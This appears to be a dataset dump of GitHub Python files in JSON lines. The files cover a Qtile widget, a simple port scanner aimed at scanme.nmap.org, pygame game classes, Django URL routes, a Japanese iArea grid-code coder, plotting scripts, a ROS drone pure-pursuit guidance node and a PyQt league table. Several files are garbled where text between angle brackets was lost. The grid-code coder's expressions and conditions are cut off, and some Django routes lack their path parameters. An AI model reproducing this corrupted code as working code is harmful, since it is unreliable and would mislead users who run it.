{source_output.proplist}\")\n # print(\"=\" * 40)\n return found\n\n def check_state(self):\n self.active = self._check_state()\n return super().check_state()\n","repo_name":"jagguli/TAQtile","sub_path":"taqtile/widgets/live.py","file_name":"live.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"12959104895","text":"from view.Console import Console\nfrom model.PortScanner import PortScanner\n\n\nclass Controller:\n\n def __init__(self):\n self.isRunnig = True\n\n def Init(self):\n mainView = Console()\n portScanner = PortScanner(\"scanme.nmap.org\")\n\n print(\"PortScanner is Running now...\")\n\n for port in range (1, 128):\n result = portScanner.StartScan(port)\n mainView.PrintBooleanRow(\"Port : \" + str(result['port']), (result['result'] == 0), [\"OPEN\", \"CLOSE\"])\n\n","repo_name":"mae1995/scanner","sub_path":"control/Controller.py","file_name":"Controller.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14650377920","text":"import math\r\nimport pygame\r\n\r\nclass Actor:\r\n def __init__(self, *args):\r\n self.id = args[0] # ID\r\n self.shape = args[1] # 모양\r\n self.hp = args[2] # 체력\r\n self.power = args[3] # 파워\r\n self.speed = args[4] # 스피드\r\n self.shotDelay = args[5] # 총알 딜레이\r\n # 초기화\r\n self.xPos = 1.0 # X좌표\r\n self.yPos = 1.0 # Y좌표\r\n self.angle = 0.0 # 움직임 각도\r\n \r\n self.width = self.shape.get_rect().size[0] # 가로 크기\r\n self.height = self.shape.get_rect().size[1] # 세로 크기\r\n \r\n self.aliveTimer = pygame.time.get_ticks() # 살아 있는 시간\r\n self.shotTimer = pygame.time.get_ticks() # 총알 딜레이 시간\r\n self.damageTimer = pygame.time.get_ticks() # 데미지 딜레이시간\r\n \r\n self.moveTimer 
= pygame.time.get_ticks()\r\n \r\n self.startPosX = 0\r\n self.startPosY = 0\r\n \r\n self.tag = \"None\"\r\n \r\n self.isAlive = False\r\n \r\n self.currentHp = self.hp\r\n \r\n self.pattern = 0\r\n self.invincibility = False\r\n \r\n\r\n def ChangeShotDelay(self, delay):\r\n self.shotDelay = delay\r\n\r\n def ShotDelay(self):\r\n \r\n if self.isAlive == True:\r\n if (pygame.time.get_ticks() - self.shotTimer) /1000 > self.shotDelay:\r\n self.shotTimer = pygame.time.get_ticks()\r\n return True\r\n \r\n return False\r\n \r\n def ChangeScale(self, width, height):\r\n self.shape = pygame.transform.scale(self.shape,(width, height))\r\n self.width = width\r\n self.height = height\r\n \r\n def ChangeRotation(self, renderAngle):\r\n self.shape = pygame.transform.rotate(self.shape, renderAngle)\r\n \r\n def MoveSpawn(self, xPos, yPos, speed, angle, tag):\r\n self.xPos = xPos\r\n self.yPos = yPos\r\n self.speed = speed\r\n self.angle = angle\r\n self.tag = tag\r\n \r\n self.currentHp = self.hp\r\n self.pattern = 0\r\n self.isAlive = True\r\n \r\n def AppearSpawn(self, xPos, yPos, tag):\r\n self.xPos = xPos\r\n self.yPos = yPos\r\n self.speed = 0\r\n self.tag = tag\r\n \r\n self.currentHp = self.hp\r\n self.pattern = 0\r\n self.isAlive = True\r\n\r\n def MoveDestination(self, xPos, yPos, play_timer):\r\n \r\n timer = (pygame.time.get_ticks() - self.moveTimer) / 1000\r\n \r\n if timer > play_timer - 0.02:\r\n self.moveTimer = pygame.time.get_ticks()\r\n else:\r\n targetVec = pygame.Vector2(xPos, yPos)\r\n playerVec = pygame.Vector2(self.startPosX, self.startPosY)\r\n \r\n resultVec = pygame.Vector2.lerp(playerVec,targetVec, timer/play_timer)\r\n \r\n self.xPos = resultVec.x\r\n self.yPos = resultVec.y\r\n \r\n if timer/play_timer >= 0.98:\r\n self.moveTimer = pygame.time.get_ticks()\r\n self.startPosX = self.xPos\r\n self.startPosY = self.yPos\r\n return True\r\n \r\n return False\r\n \r\n def Move(self):\r\n if self.isAlive == True:\r\n if self.pattern == 0:\r\n rads = math.radians(self.angle)\r\n \r\n self.xPos += (math.cos(rads) * self.speed)\r\n self.yPos += (math.sin(rads) * self.speed)\r\n \r\n if self.xPos < -300 or \\\r\n self.xPos > 680 or \\\r\n self.yPos < -300 or \\\r\n self.yPos > 840:\r\n self.isAlive = False\r\n \r\n def Hit(self, damage):\r\n \r\n self.currentHp -= damage\r\n \r\n if self.currentHp < 0:\r\n self.isAlive = False\r\n return True\r\n \r\n return False \r\n \r\n \r\n \r\nclass Enemy(Actor):\r\n def __init__(self, *args):\r\n super().__init__(*args)\r\n \r\n self.tag = \"Enemy\"\r\n \r\nclass Player(Actor):\r\n def __init__(self, *args):\r\n super().__init__(*args)\r\n self.profile = args[6]\r\n self.initLife = args[7]\r\n self.initBomber = args[8]\r\n self.shieldAlive = False\r\n \r\n self.tag = \"Player\"\r\n \r\n def SetShield(self, state):\r\n self.shieldAlive = state\r\n \r\n \r\n \r\nclass Boss(Actor):\r\n def __init__(self, *args):\r\n super().__init__(*args)\r\n \r\n self.tag = \"Boss\"","repo_name":"ReDocuSpace/AIClass","sub_path":"Python/Python_Project/ShootingGame/actor.py","file_name":"actor.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2876022053","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('list/', views.list, name=\"list\"), # 레스토랑의 리스트를 보여주는 화면이다. 
/third/list/ 접속 경로를 의미한다.\n path('create/', views.create, name='restaurant-create'),\n path('update/', views.update, name='restaurant-update'),\n\n # path('delete/', views.delete, name='restaurant-delete'),\n path('restaurant//delete/', views.delete, name='restaurant-delete'),\n\n # path('detail/', views.detail, name='restaurant-detail'),\n path('restaurant//', views.detail, name='restaurant-detail'), # detail 의 주소를 패스파라미터(쿼리파라미터 말고)를 사용할 수 있도록 재정의함.\n\n path('restaurant//review/create/', views.review_create, name='review-create'),\n path('restaurant//review/delete/', views.review_delete, name='review-delete'),\n path('review/list/', views.review_list, name='review-list'),\n]\n","repo_name":"tkguswls1106/first-django","sub_path":"third/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"16258699333","text":"# coding: UTF-8\r\n# Coder for Japanese iarea grid code.\r\n# NTT DoCoMo's Open iArea in Japan use a gridcode which is very similar to\r\n# JIS X 0410, but absolutely different in detail.\r\n\r\ndef _encode_i2c(lat,lon,basebits):\r\n\tt=[]\r\n\tfor i in range(basebits-3):\r\n\t\tt.append((lat&1)*2 + (lon&1))\r\n\t\tlat = lat>>1\r\n\t\tlon = lon>>1\r\n\t\r\n\tif basebits>=3:\r\n\t\tt.append(lon&7)\r\n\t\tt.append(lat&7)\r\n\t\tlat = lat>>3\r\n\t\tlon = lon>>3\r\n\t\r\n\tt.append(lon)\r\n\tt.append(lat)\r\n\tt.reverse()\r\n\treturn ''.join([str(i) for i in t])\r\n\r\ndef encode(lat, lon):\r\n\tif lat<7 or lon<100:\r\n\t\traise Exception('Unsupported location')\r\n\t\r\n\tbasebits = 8\r\n\treturn _encode_i2c(int(lat * (1<6:\r\n\t\tfor i in gridcode[6:]:\r\n\t\t\tlat = (lat<<1) + int(int(i)/2)\r\n\t\t\tlon = (lon<<1) + int(i)%2\r\n\t\t\tbase = base<<1\r\n\t\t\tbasebits += 1\r\n\t\r\n\tif len(gridcode)>4:\r\n\t\tlat = int(gridcode[4:5])*base + lat\r\n\t\tlon = int(gridcode[5:6])*base + lon\r\n\t\tbase = base<<3\r\n\t\tbasebits += 3\r\n\t\r\n\tlat = int(gridcode[0:2])*base + lat\r\n\tlon = int(gridcode[2:4])*base + lon\r\n\t\r\n\treturn (lat, lon, basebits)\r\n\r\ndef decode_sw(gridcode, delta=False):\r\n\tlat, lon, basebits = _decode_c2i(gridcode)\r\n\t\r\n\tif delta:\r\n\t\treturn (float(lat)/(1.5*(1<(90<(100< number_top:\n break\n ranked_document[lKey[0]] = dicSimilarity.get(lKey[0])\n index+=1\n\n print(\"Calculate completely\")\n return [ranked_document, ranked_similarity]\n\ndef score(ranked_document, sKey):\n value = 0\n for rank,document_key in enumerate(ranked_document):\n if sKey.upper() == document_key.upper():\n value = rank/len(ranked_document)\n print(value)\n break\n\n # scoreSum = 0\n # for s in scores:\n # scoreSum += s\n # accuracy = scoreSum / 5\n\n return value","repo_name":"yejoonlee/Journal-Recomadation","sub_path":"Function_NLP/functions_for_w2v.py","file_name":"functions_for_w2v.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74394718134","text":"#!/usr/bin/arch -i386 python2.7\n#\n# Author: Kevin Klues \n\nimport os\nimport re\nimport glob\nimport json\nimport matplotlib\nimport matplotlib as mpl\nmatplotlib.use('Agg')\nfrom pylab import *\nfrom collections import OrderedDict\nimport numpy as np\n\nclass BenchmarkData:\n def __init__(self, config):\n self.files = map(lambda x: os.path.join(config.input_folder, x), next(os.walk(config.input_folder))[2])\n self.data = {}\n map(lambda x: FileData(x, self), self.files)\n\nclass 
FileData:\n def __init__(self, f, bdata):\n mainpat = re.compile('^main-output$')\n thumbpat = re.compile('^thumbnails-(?P.*)-(?P.*)$')\n blastpat = re.compile('^blast-(?P.*)$')\n\n filename = os.path.basename(f)\n lines = map(lambda x: x.strip(), file(f).readlines())\n\n m = mainpat.match(filename)\n if m != None:\n bdata.data['main'] = ParseMainData(lines, bdata).data\n return\n m = thumbpat.match(filename)\n if m != None:\n lib = m.group('lib')\n td = ParseThroughputData(lines, bdata).data\n bdata.data.setdefault('thumbnails', {})\n bdata.data['thumbnails'].setdefault(lib, [])\n bdata.data['thumbnails'][lib].append(td)\n return\n m = blastpat.match(filename)\n if m != None:\n lib = m.group('lib')\n td = ParseThroughputData(lines, bdata).data\n bdata.data.setdefault('blast', {})\n bdata.data['blast'].setdefault(lib, [])\n bdata.data['blast'][lib].append(td)\n return\n\nclass ParseMainData:\n def __init__(self, lines, bdata):\n self.data = OrderedDict()\n for line in lines:\n if line == \"\":\n continue\n if line[0:15] == 'Configuration: ':\n config = line[15:]\n self.data[config] = {}\n else:\n name,time = map(lambda x: x.strip(), line.split(':'))\n a,t = map(lambda x: x.strip(), name.split('_'))\n self.data[config].setdefault(a, {})\n self.data[config][a].setdefault(t, [])\n self.data[config][a][t].append(float(time))\n if 'starttime' not in self.data[config]:\n self.data[config]['starttime'] = float(time)\n\nclass ParseThroughputData:\n def __init__(self, lines, bdata):\n self.data = []\n for i, line in enumerate(lines):\n sl = map(lambda x: x.strip(), line.split(','))\n self.data.append({\n 'throughput' : float(sl[0].split(' ')[0]),\n 'avg latency' : float(sl[1].split(' ')[0]),\n 'std latency' : float(sl[2].split(' ')[0]),\n 'total requests' : float(sl[3].split(' ')[0]),\n 'interval time' : float(sl[4].split(' ')[0]),\n 'total time' : float(sl[5].split(' ')[0])\n })\n\ndef graph_throughput(bdata, config):\n fig, ax1 = plt.subplots()\n fig.subplots_adjust(hspace=0.3)\n colors = [\"#396AB1\", \"#CC2529\", \"#3E9651\", \"#948B3D\",\n \"#DA7C30\", \"#535154\", \"#922428\"]\n\n labels = OrderedDict([\n ('linux', 'Linux NPTL'),\n ('upthread', 'upthread'),\n ('upthread-lithe', 'upthread-lithe'),\n #('upthread-native-omp', 'upthread with NPTL-based OMP'),\n #('upthread-lithe-native-omp', 'upthread-lithe with NPTL-based OMP'),\n ])\n\n for i, lib in enumerate(labels.keys()):\n starttime = bdata.data['main'][lib]['starttime']\n for j, source in enumerate(['thumbnails', 'blast']):\n launches = bdata.data['main'][lib]['launch'][source]\n time = []\n throughput = []\n latency = []\n for k, data in enumerate(bdata.data[source][lib]):\n newtime = map(lambda x: x['total time'] + launches[k] - starttime, data)\n time += [newtime[0]] + newtime + [newtime[-1]]\n throughput += [0] + map(lambda x: x['throughput'], data) + [0]\n latency += [0] + map(lambda x: x['avg latency'], data) + [0]\n ax = subplot(4, 1, j + 1)\n plot(time, throughput, label=labels[lib], color=colors[i], linewidth=1.2)\n for label in ax.yaxis.get_ticklabels()[::2]:\n label.set_visible(False)\n xlim([0, 1600])\n ax = subplot(4, 1, 2 + j + 1)\n plot(time, latency, label=labels[lib], color=colors[i], linewidth=1.2)\n for label in ax.yaxis.get_ticklabels()[::2]:\n label.set_visible(False)\n xlim([0, 1600])\n\n suptitle('Kweb Throughput and Latency\\nMixing File Requests and Thumbnail Generation', y=1.15, fontsize=20)\n ax = subplot(4, 1, 1)\n title('Thumbnail Request Throughput')\n ylabel('Throughput\\n(Requests / Second)', labelpad=25, 
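    # The coordinates passed to ax.yaxis.set_label_coords(-0.13, -0.025) a
    # few lines below are in axes-fraction space; placing y below 0 centers
    # this one label across the two stacked throughput panels. The same
    # trick in isolation (values here are illustrative, not from the run):
    #   ax = subplot(2, 1, 1)
    #   ylabel('shared y-label')
    #   ax.yaxis.set_label_coords(-0.1, 0.0)  # left of spine, at panel base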
fontsize=16)\n ax.yaxis.set_label_coords(-0.13, -0.025)\n xx, locs = xticks()\n xticks(xx, [])\n leg = legend(loc='center', bbox_to_anchor=[0.5, 1.55, 0, 0], ncol=3)\n for legobj in leg.legendHandles:\n legobj.set_linewidth(10.0)\n\n subplot(4, 1, 2)\n title('File Request Throughput')\n xx, locs = xticks()\n xticks(xx, [])\n\n ax = subplot(4, 1, 3)\n title('Thumbnail Request Latency')\n ylabel('Latency (s)', fontsize=16)\n ax.yaxis.set_label_coords(-0.13, -0.025)\n xx, locs = xticks()\n xticks(xx, [])\n yy, locs = yticks()\n ll = ['%.2f' % a for a in yy]\n yticks(yy, ll)\n\n subplot(4, 1, 4)\n title('File Request Latency')\n xlabel('Time (s)', fontsize=16)\n\n figname = config.output_folder + \"/thumbnails-throughput.png\"\n savefig(figname, bbox_inches=\"tight\")\n clf()\n\ndef thumbnails_graphs(parser, args):\n config = lambda:None\n if args.config_file:\n config.__dict__ = json.load(file(args.config_file), object_pairs_hook=OrderedDict)\n else:\n parser.print_help()\n exit(1)\n\n try:\n os.mkdir(config.output_folder)\n except:\n pass\n bdata = BenchmarkData(config)\n graph_throughput(bdata, config)\n\n","repo_name":"klueska/lithe-benchmarks","sub_path":"thumbnails_net/python/thumbnails_graphs.py","file_name":"thumbnails_graphs.py","file_ext":"py","file_size_in_byte":5497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23264016253","text":"from ships import *\n\nscout = {'name': \"Scout\",\n 'hp': 1,\n 'atk': 3,\n 'df': 0,\n 'ship_class': \"E\",\n 'cp_cost': 6,\n 'obj': Scout}\n\nbattlecruiser = {'name':\"BattleCruiser\",\n 'hp': 2,\n 'atk': 5,\n 'df': 1,\n 'ship_class': \"B\",\n 'cp_cost': 15,\n 'obj': BattleCruiser}\n\ncruiser = {'name':\"Cruiser\",\n 'hp': 2,\n 'atk': 4,\n 'df': 1,\n 'ship_class': \"C\",\n 'cp_cost': 12,\n 'obj': Cruiser}\n\ndestroyer = {'name':\"Destroyer\",\n 'hp': 1,\n 'atk': 4,\n 'df': 0,\n 'ship_class': \"D\",\n 'cp_cost': 9,\n 'obj': Destroyer}\n\ndreadnaught = {'name':\"Dreadnaught\",\n 'hp': 3,\n 'atk': 6,\n 'df': 3,\n 'ship_class': \"A\",\n 'cp_cost': 24,\n 'obj': Dreadnaught}\n\nall_ship_infos = [scout, battlecruiser, cruiser, dreadnaught, destroyer]\n\n#{'Scout': 0, 'BattleCruiser': 0, 'Cruiser': 0, 'Destroyer': 0, 'Dreadnaught': 0}","repo_name":"snowthesprite/space-empires","sub_path":"ships/ship_data.py","file_name":"ship_data.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38956324844","text":"\"\"\" Uses a list to group the words from a text file according to\n their length (number of letters). \"\"\"\n\nimport sys # For argv global command line arguments list\n\n\ndef main():\n \"\"\" Group the words by length in a text file. 
\"\"\"\n if len(sys.argv) < 2: # Did the user not supply a file name?\n print('Usage: python groupwordslist.py ')\n print(' where is the name of a text file.')\n else: # User provided file name\n filename = sys.argv[1]\n groups = [] # Initialize grouping list\n for i in range(20):\n groups.append(set()) # Add new empty set to the list \n with open(filename, 'r') as f: # Open the file for reading\n content = f.read() # Read in content of the entire file\n words = content.split() # Make list of individual words\n for word in words:\n word = word.upper() # Make the word all caps\n # Compute the word's length\n size = len(word)\n groups[size].add(word)\n # Show the groups\n for size, group in enumerate(groups):\n print(size, ':', group)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"halterman/PythonBook-SourceCode","sub_path":"Chap11/groupwordslist.py","file_name":"groupwordslist.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"21"} +{"seq_id":"74473354934","text":"\"\"\"\nEscape codes | Use\n-----------------------------------------\n d | Matches digit\n D | Matches non-digit\n s | Matches whitespace\n S | Matches non-whitespace\n w | Matches alphanumeric\n W | Matches non-alphanumeric\n\"\"\"\n\n\n\"\"\"\nSpecial Note: When we compile patterns, they will get automatically cached so \nif we aren’t using a lot of regular expressions in our code, then we may not \nneed to save the compiled object to a variable.\n\"\"\"\nimport re\n\ntext = \"The ants go marching one by one\"\n\nstrings = [\"the\", \"one by\"]\n\nfor string in strings:\n regex = re.compile(string)\n print(\"regex-> \", regex)\n match = re.search(string, text)\n print(\"match\", match)\n if match:\n print('Found \"{}\" in \"{}\"'.format(string, text))\n text_pos = match.span()\n print(\"->\", text[match.start() : match.end()])\n else:\n print('Did not find \"{}\"'.format(string))\n\n\n# findall()\nprint(\"Findall()\")\nsilly_string = \"the cat in the hat\"\npattern = \"the\"\nprint(re.findall(pattern, silly_string))\n\n\n# finditer()\nprint(\"Finditer()\")\n\n\nsilly_string = \"the cat in the hat\"\npattern = \"the\"\n\nfor match in re.finditer(pattern, silly_string):\n s = \"Found '{group}' at {begin}:{end}\".format(\n group=match.group(), begin=match.start(), end=match.end()\n )\n print(s)\n\n\n# Backslashes\ntesting_string = 'python \"\"'\nprint(testing_string) # python \"\"\n\ntesting_string = 'python \"\\\\\"'\nprint(testing_string) # python \"\\\"\n\ntesting_string = r'python \"\\\"'\nprint(testing_string) # python \"\\\"\n","repo_name":"OvePa/P201","sub_path":"regex/pattern_matching.py","file_name":"pattern_matching.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10289551593","text":"#!/usr/bin/python3\n\nimport rospy \nimport std_msgs.msg\nimport sensor_msgs.msg\n\nfrom scipy.spatial.transform import Rotation\n\nfrom geometry_msgs.msg import TwistStamped, PointStamped, QuaternionStamped, PoseWithCovarianceStamped\n\nfrom anafi_uav_msgs.msg import PointWithCovarianceStamped\nfrom anafi_uav_msgs.srv import SetDesiredPosition, SetDesiredPositionRequest, SetDesiredPositionResponse\n\nimport numpy as np\nimport guidance_helpers.utilities as utilities\n\nnp.warnings.filterwarnings('ignore', category=np.VisibleDeprecationWarning) \n\n\nclass PurePursuitGuidanceLaw():\n \"\"\"\n Guidance law generating the desired velocity 
based on the \n desired and current position \n \"\"\"\n def __init__(self) -> None:\n rospy.init_node(\"pure_pursuit_guidance_node\")\n\n controller_rate = rospy.get_param(\"~node_rate\", default = 20)\n self.dt = 1.0 / controller_rate \n self.rate = rospy.Rate(controller_rate)\n\n # Initialize parameters\n pure_pursuit_params = rospy.get_param(\"~pure_pursuit_parameters\")\n velocity_limits = rospy.get_param(\"~velocity_limits\")\n \n self.ua_max = pure_pursuit_params[\"ua_max\"]\n self.lookahead = pure_pursuit_params[\"lookahead\"]\n self.fixed_kappa = pure_pursuit_params[\"kappa\"]\n\n self.vx_limits = velocity_limits[\"vx\"]\n self.vy_limits = velocity_limits[\"vy\"]\n self.vz_limits = velocity_limits[\"vz\"]\n\n self.desired_altitude : float = -1.0\n\n self.position_timestamp : std_msgs.msg.Time = None\n self.attitude_timestamp : std_msgs.msg.Time = None\n self.desired_position_timestamp : std_msgs.msg.Time = None\n\n self.desired_position_ned : np.ndarray = np.zeros((3, 1)) # [xd, yd, zd]\n self.position_body : np.ndarray = None \n\n self.last_rotation_matrix_body_to_vehicle : np.ndarray = None\n\n # Set up subscribers \n rospy.Subscriber(\"/guidance/desired_ned_position\", PointStamped, self._desired_ned_pos_cb)\n rospy.Subscriber(\"/anafi/attitude\", QuaternionStamped, self._attitude_cb)\n\n self.use_ned_pos_from_gnss : bool = rospy.get_param(\"/use_ned_pos_from_gnss\")\n if self.use_ned_pos_from_gnss:\n rospy.loginfo(\"Pure pursuit using position estimates from GNSS. Estimates from EKF disabled\")\n rospy.Subscriber(\"/anafi/ned_pos_from_gnss\", PointStamped, self._ned_pos_cb)\n else:\n rospy.loginfo(\"Pure pursuit using position estimates from EKF. Position estimates from GNSS disabled\")\n rospy.Subscriber(\"/estimate/ekf\", PoseWithCovarianceStamped, self._ekf_cb)\n\n # Set up publishers\n self.reference_velocity_publisher = rospy.Publisher(\"/guidance/pure_pursuit/velocity_reference\", TwistStamped, queue_size=1)\n\n\n def _ekf_cb(self, msg : PoseWithCovarianceStamped) -> None:\n \"\"\"\n Callback setting the current poisition from the EKF estimate. Note that the position\n estimate is in body, and it is drone to helipad (origin). Thus, to get origin to drone,\n the values are negated \n \"\"\"\n msg_timestamp = msg.header.stamp\n\n if not utilities.is_new_msg_timestamp(self.position_timestamp, msg_timestamp):\n # Old message\n return\n \n self.position_timestamp = msg_timestamp\n self.position_body = -np.array([msg.pose.pose.position.x, msg.pose.pose.position.y, msg.pose.pose.position.z], dtype=float).reshape((3, 1)) \n\n\n def _desired_ned_pos_cb(self, msg : PointStamped) -> None:\n \"\"\"\n Callback setting the desired position for the guidance to track. \n The target position is assumed in NED \n \"\"\"\n msg_timestamp = msg.header.stamp\n\n if not utilities.is_new_msg_timestamp(self.desired_position_timestamp, msg_timestamp):\n # Old message\n return\n \n self.desired_position_timestamp = msg_timestamp\n self.desired_position_ned = np.array([msg.point.x, msg.point.y, msg.point.z], dtype=float).reshape((3, 1)) \n\n\n def _ned_pos_cb(self, msg : PointStamped) -> None:\n \"\"\"\n Position estimates using the direct bridge-estimates in NED. 
These measurements are \n origin to drone position\n \"\"\"\n msg_timestamp = msg.header.stamp\n\n if not utilities.is_new_msg_timestamp(self.position_timestamp, msg_timestamp):\n # Old message\n return\n \n if self.last_rotation_matrix_body_to_vehicle is None:\n # Impossible to convert positions to body frame\n return\n \n # Positions must be transformed to body\n self.position_timestamp = msg_timestamp\n self.position_body = self.last_rotation_matrix_body_to_vehicle.T @ np.array([msg.point.x, msg.point.y, msg.point.z], dtype=float).reshape((3, 1)) \n\n\n def _attitude_cb(self, msg : QuaternionStamped) -> None:\n msg_timestamp = msg.header.stamp\n\n if not utilities.is_new_msg_timestamp(self.attitude_timestamp, msg_timestamp):\n # Old message\n return\n \n self.attitude_timestamp = msg_timestamp\n rotation = Rotation.from_quat([msg.quaternion.x, msg.quaternion.y, msg.quaternion.z, msg.quaternion.w])\n self.attitude_rpy = rotation.as_euler('xyz', degrees=False).reshape((3, 1))\n self.last_rotation_matrix_body_to_vehicle = rotation.as_matrix()\n\n\n def _clamp(\n self, \n value: float, \n limits: tuple\n ) -> float:\n return np.min([np.max([value, limits[0]]), limits[1]]) \n\n\n def _get_pos_error_body(self) -> np.ndarray:\n \"\"\"\n Calculates a position error in body\n Assumes the attitude is known relatively correctly, such that body can be converted\n to NED\n \"\"\"\n if (self.position_timestamp is None):\n return np.zeros((3, 1))\n\n pos_error_ned = self.last_rotation_matrix_body_to_vehicle @ self.position_body - self.desired_position_ned\n pos_error_body = self.last_rotation_matrix_body_to_vehicle.T @ pos_error_ned\n\n return pos_error_body\n\n\n def calculate_velocity_reference(self) -> None:\n \"\"\"\n Generate a velocity reference from a position error using the pure\n pursuit guidance law as defined in Fossen 2021.\n \"\"\"\n twist_ref_msg = TwistStamped()\n\n vel_target = np.zeros((3, 1)) # Possible extension to use constant bearing guidance in the future\n\n while not rospy.is_shutdown():\n if self.position_body is None:\n self.rate.sleep()\n continue\n\n pos_error = self._get_pos_error_body()\n pos_error_normed = np.linalg.norm(pos_error)\n\n if pos_error_normed > 1e-3:\n kappa = (pos_error_normed * self.ua_max) / (np.sqrt(pos_error_normed + self.lookahead**2))\n vel_ref_unclamped = vel_target - (kappa * pos_error) / (pos_error_normed) \n else:\n vel_ref_unclamped = np.zeros((3, 1)).ravel()\n\n vel_ref_x = self._clamp(vel_ref_unclamped[0], self.vx_limits)\n vel_ref_y = self._clamp(vel_ref_unclamped[1], self.vy_limits)\n vel_ref_z = self._clamp(vel_ref_unclamped[2], self.vz_limits)\n\n twist_ref_msg.header.stamp = rospy.Time.now()\n twist_ref_msg.twist.linear.x = vel_ref_x\n twist_ref_msg.twist.linear.y = vel_ref_y\n twist_ref_msg.twist.linear.z = vel_ref_z\n\n self.reference_velocity_publisher.publish(twist_ref_msg)\n self.rate.sleep()\n\n\ndef main():\n guidance_law = PurePursuitGuidanceLaw()\n guidance_law.calculate_velocity_reference()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"oyssolbo/anafi_gnc","sub_path":"guidance/scripts/pure_pursuit.py","file_name":"pure_pursuit.py","file_ext":"py","file_size_in_byte":7109,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73075930611","text":"from PyQt5 import QtGui\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QTableWidget, QTableWidgetItem\n\nfrom controllers.team_controller import getTeamsData\nfrom data_loaders.utils import getTeamLogo\nfrom 
utils.font_utils import get_font\nfrom view.team_window import TeamWindow\n\n\nclass LeagueTable(QTableWidget):\n def __init__(self, opt=\"All Matches\"):\n super().__init__()\n self.team_window = None\n self.setRowCount(20)\n self.setColumnCount(10)\n columns = (\"\", \"Club Name\", \"Played\", \"W\", \"D\", \"L\", \"GF\", \"GA\", \"GD\", \"Points\")\n self.setHorizontalHeaderLabels(columns)\n self.setColumnWidth(0, 30)\n self.setColumnWidth(1, 250)\n self.load_data(opt)\n self.set_style()\n self.itemDoubleClicked.connect(self.click_handler)\n\n def set_style(self):\n for col in range(1, self.columnCount()):\n self.item(0, col).setBackground(QtGui.QColor(238, 206, 0))\n for row in range(1, 4):\n for col in range(1, self.columnCount()):\n self.item(row, col).setBackground(QtGui.QColor(153, 204, 255))\n for row in range(4, 6):\n for col in range(1, self.columnCount()):\n self.item(row, col).setBackground(QtGui.QColor(255, 204, 153))\n for row in range(17, 20):\n for col in range(1, self.columnCount()):\n self.item(row, col).setBackground(QtGui.QColor(255, 153, 153))\n\n def load_data(self, opt):\n cols = [\"league_position\", \"wins\", \"draws\", \"losses\",\n \"goals_scored\", \"goals_conceded\", \"goal_difference\", \"points\"]\n matches_played = \"38\"\n\n if opt == \"Home Only\":\n cols = [col + \"_home\" for col in cols]\n matches_played = \"19\"\n if opt == \"Away Only\":\n cols = [col + \"_away\" for col in cols]\n matches_played = \"19\"\n\n teams_data = getTeamsData()\n for team in teams_data:\n row = int(team[cols[0]]) - 1 # league_position\n logo_widget = getTeamLogo(team[\"common_name\"])\n logo_widget.setAlignment(Qt.AlignHCenter)\n self.setCellWidget(row, 0, logo_widget)\n self.setItem(row, 1, QTableWidgetItem(team[\"common_name\"]))\n self.setItem(row, 2, QTableWidgetItem(matches_played))\n self.setItem(row, 3, QTableWidgetItem(team[cols[1]])) # wins\n self.setItem(row, 4, QTableWidgetItem(team[cols[2]])) # draws\n self.setItem(row, 5, QTableWidgetItem(team[cols[3]])) # losses\n self.setItem(row, 6, QTableWidgetItem(team[cols[4]])) # goals scored\n self.setItem(row, 7, QTableWidgetItem(team[cols[5]])) # goals conceded\n self.setItem(row, 8, QTableWidgetItem(team[cols[6]])) # goals difference\n font = get_font(bold=True)\n point_item = QTableWidgetItem(str(team[\"points\"]))\n point_item.setFont(font)\n self.setItem(row, 9, point_item)\n\n def click_handler(self, item: QTableWidgetItem):\n if item.column() == 0 or item.column() == 1:\n team_common_name = self.item(item.row(), 1).text()\n self.team_window = TeamWindow(team_common_name)\n self.team_window.show()","repo_name":"maitruongson-vn107/EPL-1819-Dashboard","sub_path":"view/main_window_components/league_table.py","file_name":"league_table.py","file_ext":"py","file_size_in_byte":3246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15485275826","text":"#@@@@@@@@@@@@@@@Pheonix.Store.ObjNQL.TxtONQL@@@@@@@@@@@@@@@@@@@||\n'''\n---\n<(META)>:\n\tDOCid: f44e5ac0-73c7-4d95-a280-ca9bcd7b8491\n\tname:\n\tdescription: >\n\t\tOpen Plain Text File Objects and Fill Text Template as Needed\n\texpirary: <[expiration]>\n\tversion: <[version]>\n\tpath: <[LEXIvrs]>pheonix/elements\n\toutline: <[outline]>\n\tauthority: document|this\n\tsecurity: sec|lvl2\n\t<(WT)>: -32\n'''\n# -*- coding: utf-8 -*-\n#===============================================================================||\nimport datetime as dt, pprint, time#\t\t\t\t\t\t\t\t\t\t\t||\nfrom os.path import abspath, dirname, 
